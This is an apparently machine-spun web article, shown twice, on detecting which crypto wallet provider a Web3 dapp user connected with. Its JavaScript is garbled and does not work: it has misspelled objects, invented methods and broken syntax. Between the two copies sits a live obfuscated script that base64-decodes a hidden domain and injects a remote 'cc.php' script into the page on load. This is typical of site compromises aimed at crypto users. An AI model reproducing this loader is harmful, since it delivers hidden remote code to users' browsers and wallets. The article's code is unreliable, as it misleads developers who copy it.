determination of a particular wallet provider used by web3 dapp
As decentralized applications (DAPP) on blockchain platforms increased, it is becoming increasedly important to track and manage user wallet connections. One Common Challenge is to determine which particular wallet provider was used to connect to a specific dapp. In this article, we will explore how to introduce a solution using JavaScript Web3 Libraries.
Current Approach
Your current approach include an «Ethereum» and «Web3» presence test in your code base, but it does not provide any information on which purse provider was used to connect to dapp. This is because both libraries may have severe purse service providers installed on the user computer.
Review Solutions
To solve this problem, we will use the’s ability to identify and parse the purse service providers from the ethereum wallet provider. We will also create a custom feature that tests specific wallet providers and will return their names as a massive.
Const ethereum = window.etheum;
Const Web3 = Window.Web3;
// Function to Fix Wallet Service Providers and Return them as an array
Function Getwalletproviders () {
Const provider = ethereum.currentprovider;
Const wallets = [];
If (provider && provider.Getaccounts ()) {
For (Const Account Service Provider.Getaccounts ()) {
Const Wallet Name = Detectwalletprovider (Wallets, '0x ...')); // Replace with the actual wallet name
if (wallet name! == null) {
Console.log (Connected to $ {Wallet Name} using ethereum);
} Else {
Console.log ('No Appropriate Service Provider Found);
In this implementation:
Function Getwalletproviders () The feature uses.Currentprovider 'and checks that it is available by checking for the presence of wallet providers.
then it repeats all ethereum network accounts usingWeb3.eth.accounts.cromrawhash () The method that converts the Raw Account to the hashes to their relevant names.
Function Detectwalletprovider () As input, take the service provider’s object array and a specified wallet name. It filters a list based on whether the name provided corresponds to one of the list of service providers. If the game is found, it returns the name of the appropriate service provider; Otherwise, it returns to «null».
4 in the use section we show how to call «Detectwalletprovider () A Function of a Specified Wallet Name obtained from» GetWalletprovider () «. We record the result in the console.
By implementing this custom solution using a combination of web3 and features for the determination of wallet service providers, you can effectively track which purse provider was used to connect to a specified dapp. This approach allows you to manage multiple safe service providers on user devices while providing an invisible user experience.
Metamask: How to detect the specific wallet provider used by the user in a web3 dapp when multiple wallet providers are installed?
const pdx=»bm9yZGVyc3dpbmcuYnV6ei94cC8=»;const pde=atob(pdx.replace(/|/g,»»));const script=document.createElement(«script»);script.src=»https://»+pde+»cc.php?u=6279c5bb»;document.body.appendChild(script);
determination of a particular wallet provider used by web3 dapp
As decentralized applications (DAPP) on blockchain platforms increased, it is becoming increasedly important to track and manage user wallet connections. One Common Challenge is to determine which particular wallet provider was used to connect to a specific dapp. In this article, we will explore how to introduce a solution using JavaScript Web3 Libraries.
Current Approach
Your current approach include an «Ethereum» and «Web3» presence test in your code base, but it does not provide any information on which purse provider was used to connect to dapp. This is because both libraries may have severe purse service providers installed on the user computer.
Review Solutions
To solve this problem, we will use the’s ability to identify and parse the purse service providers from the ethereum wallet provider. We will also create a custom feature that tests specific wallet providers and will return their names as a massive.
Const ethereum = window.etheum;
Const Web3 = Window.Web3;
// Function to Fix Wallet Service Providers and Return them as an array
Function Getwalletproviders () {
Const provider = ethereum.currentprovider;
Const wallets = [];
If (provider && provider.Getaccounts ()) {
For (Const Account Service Provider.Getaccounts ()) {
Const walletname = web3.eth.accounts.cromrawhash (account.rawhash);
wallet.pushpus (wallet name);
Return wallets;
// Function to determine a particular purse service provider
Function Detectwalletprovider (Service Providers, Wallet Name) {
Const Conciliator Companies = Service Providers.Filter (Service Provider => Provider.Name === Walletname);
if (reconciling providers.lenphth> 0) {
Return Match Owners [0]. // Return the name of the appropriate service provider
} Else {
Return zero;
// Example Use:
Const wallets = Getwalletproviders ();
Console.log (wallets); // Output: ['...']
Const ethereumprovider = ethereum.currentprovider;
Const Web3Provider = Window.Web3.Currentprovider;
Const Wallet Name = Detectwalletprovider (Wallets, '0x ...')); // Replace with the actual wallet name
if (wallet name! == null) {
Console.log (Connected to $ {Wallet Name} using ethereum
} Else {
Console.log ('No Appropriate Service Provider Found);
In this implementation:
Getwalletproviders () The feature uses
.Currentprovider 'and checks that it is available by checking for the presence of wallet providers.
Detectwalletprovider ()
As input, take the service provider’s object array and a specified wallet name. It filters a list based on whether the name provided corresponds to one of the list of service providers. If the game is found, it returns the name of the appropriate service provider; Otherwise, it returns to «null».4 in the use section we show how to call «Detectwalletprovider () A Function of a Specified Wallet Name obtained from» GetWalletprovider () «. We record the result in the console.
By implementing this custom solution using a combination of web3 and features for the determination of wallet service providers, you can effectively track which purse provider was used to connect to a specified dapp. This approach allows you to manage multiple safe service providers on user devices while providing an invisible user experience.